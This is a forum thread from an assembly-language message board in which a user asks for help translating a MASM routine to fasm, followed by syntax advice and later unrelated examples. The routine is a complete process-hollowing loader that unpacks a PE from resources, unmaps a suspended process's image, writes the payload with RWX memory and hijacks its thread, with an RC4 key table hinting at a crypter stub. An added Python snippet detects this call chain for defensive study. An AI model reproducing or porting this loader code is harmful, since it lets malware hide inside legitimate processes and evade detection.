flat assembler
Message board for the users of flat assembler.

trying to translate to fasm from masm
demien 30 Aug 2011, 13:26
Hi. I am new to fasm and am trying to translate a procedure to fasm, need help!

How do I declare LOCAL sinfo: STARTUPINFO?
For .if eax != 0, do I need to write macros?

Code:
ExtractFile:
LOCAL sinfo: STARTUPINFO
LOCAL pinfo: PROCESS_INFORMATION
LOCAL base: dword
LOCAL sec: ptr IMAGE_SECTION_HEADER
LOCAL cnt: CONTEXT
xinvoke GetModuleFileName, 0, offset mPath, 256
xinvoke GetModuleHandle, 0
mov hInstance, eax
xinvoke FindResource, hInstance, RCDATA, 1
.if eax != 0
  mov hResource, Eax
  xinvoke SizeofResource, hInstance, hResource
  .if eax != 0
    mov hResourceSize, eax
    xinvoke LoadResource, hInstance, hResource
    .if eax != 0
      xinvoke LockResource, eax
      mov ResInf , eax
      xinvoke RtlZeroMemory, addr sinfo, sizeof STARTUPINFO
      xinvoke CreateProcess, offset mPath, 0, 0, 0, 0, CREATE_SUSPENDED, 0, 0, addr sinfo, addr pinfo
      xinvoke RtlZeroMemory, addr cnt, sizeof CONTEXT
      mov cnt.ContextFlags, CONTEXT_INTEGER
      xinvoke GetThreadContext, pinfo.hThread, addr cnt
      xinvoke GetModuleHandle, 0
      mov esi,eax
      xinvoke LoadLibrary,addr nt
      xinvoke GetProcAddress,eax,addr zw
      lea ebx,pinfo.hProcess
      PUSH ESI
      PUSH [EBX]
      call eax
      ;xinvoke ZwUnmapViewOfSection, pinfo.hProcess, eax
      mov edi, ResInf
      add edi, IMAGE_DOS_HEADER.e_lfanew[edi]
      assume edi:  ptr IMAGE_NT_HEADERS
      xinvoke VirtualAllocEx, pinfo.hProcess, [edi].OptionalHeader.ImageBase, [edi].OptionalHeader.SizeOfImage, MEM_COMMIT + MEM_RESERVE, PAGE_EXECUTE_READWRITE
      mov base, eax
      xinvoke WriteProcessMemory, pinfo.hProcess, base, ResInf , [edi].OptionalHeader.SizeOfHeaders, 0
      lea eax, [edi].OptionalHeader
      mov sec, eax
      movzx eax, [edi].FileHeader.SizeOfOptionalHeader
      add sec, eax
      xor eax, eax
      xor esi, esi
      xor ecx, ecx
      .while ( si < [edi].FileHeader.NumberOfSections )
        imul eax, esi, sizeof IMAGE_SECTION_HEADER
        add eax, sec
        mov ebx, base
        add ebx, IMAGE_SECTION_HEADER.VirtualAddress[eax]
        mov edx, ResInf
        add edx, IMAGE_SECTION_HEADER.PointerToRawData[eax]
        xinvoke WriteProcessMemory, pinfo.hProcess, ebx, edx, IMAGE_SECTION_HEADER.SizeOfRawData[eax],0
        inc esi
      .endw
      mov eax, base
      add eax, [edi].OptionalHeader.AddressOfEntryPoint
      mov cnt.regEax, eax
      xinvoke SetThreadContext, pinfo.hThread, addr cnt
      xinvoke ResumeThread, pinfo.hThread
      ret
    .endif
  .endif
.endif
    

_________________
asm power!
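
Seen from the detection side, the routine posted above issues an ordered chain of Win32 calls against one child process: a suspended CreateProcess, a PAGE_EXECUTE_READWRITE VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread. The following Python is an added example, not part of the original thread; the trace format, the PIDs and the sample lines are constructed assumptions standing in for whatever API telemetry a monitoring tool provides.

```python
import re

# Stages of the call chain in the post above, in the order the routine issues them.
STAGES = ["CreateProcess", "VirtualAllocEx", "WriteProcessMemory",
          "SetThreadContext", "ResumeThread"]

# Constructed sample trace (hypothetical format): caller pid, API, target pid, detail.
SAMPLE_TRACE = """\
1000 CreateProcess target=2000 flags=CREATE_SUSPENDED
1000 ZwUnmapViewOfSection target=2000
1000 VirtualAllocEx target=2000 protect=PAGE_EXECUTE_READWRITE
1000 WriteProcessMemory target=2000 size=1024
1000 WriteProcessMemory target=2000 size=4096
1000 SetThreadContext target=2000
1000 ResumeThread target=2000
3000 CreateProcess target=4000 flags=CREATE_SUSPENDED
3000 ResumeThread target=4000
5000 CreateProcess target=6000 flags=0
5000 VirtualAllocEx target=6000 protect=PAGE_READWRITE
5000 WriteProcessMemory target=6000 size=16
"""

LINE = re.compile(r"^(\d+) (\w+) target=(\d+)(?: (\w+)=(\S+))?$")

def stage_reached(api, key, val, idx):
    """Return True if this event satisfies stage idx of the chain."""
    if api != STAGES[idx]:
        return False
    if api == "CreateProcess":
        return key == "flags" and "CREATE_SUSPENDED" in val.split("|")
    if api == "VirtualAllocEx":
        return key == "protect" and val == "PAGE_EXECUTE_READWRITE"
    return True

def find_hollowing(trace):
    """Return sorted (caller, target) pairs that completed every stage in order."""
    progress, hits = {}, set()
    for line in trace.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue  # skip lines that do not parse
        caller, api, target, key, val = m.groups()
        pair = (int(caller), int(target))
        idx = progress.get(pair, 0)
        if idx < len(STAGES) and stage_reached(api, key, val or "", idx):
            progress[pair] = idx + 1
            if idx + 1 == len(STAGES):
                hits.add(pair)
    return sorted(hits)
```

A launcher that only creates a suspended child and resumes it (pair 3000/4000 in the sample) does not complete the chain and is not reported.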

Overflowz 30 Aug 2011, 13:37
Loading an executable from memory... right. Use another way, like how DLLs are loaded; do the same with the executable. (It should have a .reloc section too.)
1) sinfo STARTUPINFO
2) cmp eax,0 --> jnz somewhere
---
Also, xinvoke is another macro. Without xinvoke, that code won't work fine.

demien 30 Aug 2011, 13:50
Thanks Overflowz
and
.data?
mPath byte 256 dup (0)
ThreadID DWORD ?
hInstance dword ?
loop_stopper dword ?
ResInf dword ?
hResourceSize dword ?
hResource dword ?
rc4keytable DB 256 dup (?)

will be ?
section '.bbs' data readable
mPath rb 256h

btw
Code:
macro xinvoke proc,[arg]                    
  {                                         
    common
      if ~ arg eq
    reverse
      pushd arg
    common
      end if
    call [ebx+_#proc-_delta]
  }

entry start    


=)

and here...
xinvoke LoadLibrary,addr nt
xinvoke GetProcAddress,eax,addr zw

Do I need to do this: xinvoke LoadLibrary,addr [nt] ?
-----
Also, maybe someone already has something like my function in fasm?
With this code some exe files, for example Win XP SP2 calc.exe, execute with an error.

Overflowz 30 Aug 2011, 14:42
.data? means uninitialized data, so you can put it in any section you like; it doesn't matter.
---
About macros, I haven't learned them yet.
addr nt = just nt in fasm. xinvoke LoadLibrary,nt is the same.
---
Check this out; you may find something interesting.
http://board.flatassembler.net/topic.php?t=12644
---
Also, if you have success, can you post working code here? ;) I am stuck at the "GetThreadContext" API.

Enko 30 Aug 2011, 14:55
.if eax != 0

in fasm it is

Code:
.if eax <> 0
   ;block
.elseif eax = 1
   ;block
.else
   ;block
.endif
    


You need to include win32ax.inc, or
win32a.inc with '\macro\if.inc'.

Quote:

xinvoke LoadLibrary,addr nt
xinvoke GetProcAddress,eax,addr zw
i need do such: xinvoke LoadLibrary,addr [nt] ?

Sorry, I don't know what xinvoke is in masm... why not use invoke?

for the "addr":


masm
Code:
var1 ;content
addr var1; address of var1
offset var1; address of var1
    

if var1 is local, in masm
Code:
addr var1
;lea eax, [ebp -X]
    



in fasm
Code:
[var1]; content 
var1; offset var1
    

if it's a local variable and you use standard macros
Code:
mov eax, var1; will fail, because:
;mov eax, ebp-8 
    

if you use extended macros, there is an addr macro for these cases.
Code:
;include (win32ax.inc)

invoke SomeProc, addr local1

;lea eax, [ebp - 8]
;push eax
;call [SomeProc]
    

Newp 13 Feb 2013, 03:42
Hello community,
I have the same problem and I don't know how to store local variables in Fasm.

And it should look like so...

Enko wrote:

if you use extended macros, there is an addr macro for these cases.
Code:
;include (win32ax.inc)

invoke SomeProc, addr local1

;lea eax, [ebp - 8]
;push eax
;call [SomeProc]
    



I tried a lot of things, like proc virtual and locals, but it will not work for me and I have no idea now.


Code:
format PE GUI 4.0
include 'D:\FASM\INCLUDE\WIN32AX.INC'

entry start 

section '.data' data readable writeable

_global   db 'Title',0
_local    db 'message',0


section '.code' code readable executable

; Entry point
start:

locals
  .var _local
endl

    invoke  MessageBox,NULL ,[.var] , _global ,MB_OK
    ret


section '.idata' import data readable

library USER32,'user32.dll'
import USER32,MessageBox,'MessageBoxA'     

Overflowz 31 Mar 2013, 02:30
Newp
Try this:
Code:
format PE GUI 4.0 
include 'D:\FASM\INCLUDE\WIN32AX.INC' 

entry start  

section '.code' code readable executable 

; Entry point 
proc start 

locals 
  _local db "Hello, World!",0 
endl 

    invoke  MessageBox,NULL ,addr _local , NULL ,MB_OK 
    ret
 
endp

section '.idata' import data readable 

library USER32,'user32.dll' 
import USER32,MessageBox,'MessageBoxA'    